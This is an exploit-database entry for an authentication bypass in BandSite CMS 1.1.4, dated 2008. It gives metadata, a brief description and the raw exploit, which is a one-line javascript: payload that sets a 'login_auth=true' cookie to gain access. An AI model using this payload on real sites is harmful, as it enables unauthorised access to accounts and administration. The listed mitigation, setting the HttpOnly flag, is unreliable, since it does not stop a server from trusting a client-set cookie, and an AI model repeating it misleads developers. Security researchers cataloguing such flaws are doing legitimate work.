header-logo
Suggest Exploit
vendor:
BandSite CMS
by:
Mountassif Moad
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: BandSite CMS
Affected Version From: 1.1.2004
Affected Version To: 1.1.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:bandsite_cms:bandsite_cms:1.1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability

A vulnerability in BandSite CMS 1.1.4 allows an attacker to set a cookie with the name 'login_auth' and value 'true' to gain access to the application.

Mitigation:

Ensure that cookies are set with the 'HttpOnly' flag to prevent them from being accessed by client-side scripts.
Source

Exploit-DB raw data:

###########################################################################
[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
[+] Discovered By Mountassif Moad                   
[+] www.v4-team.com                     
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "login_auth=true; path=/";

# milw0rm.com [2008-11-13]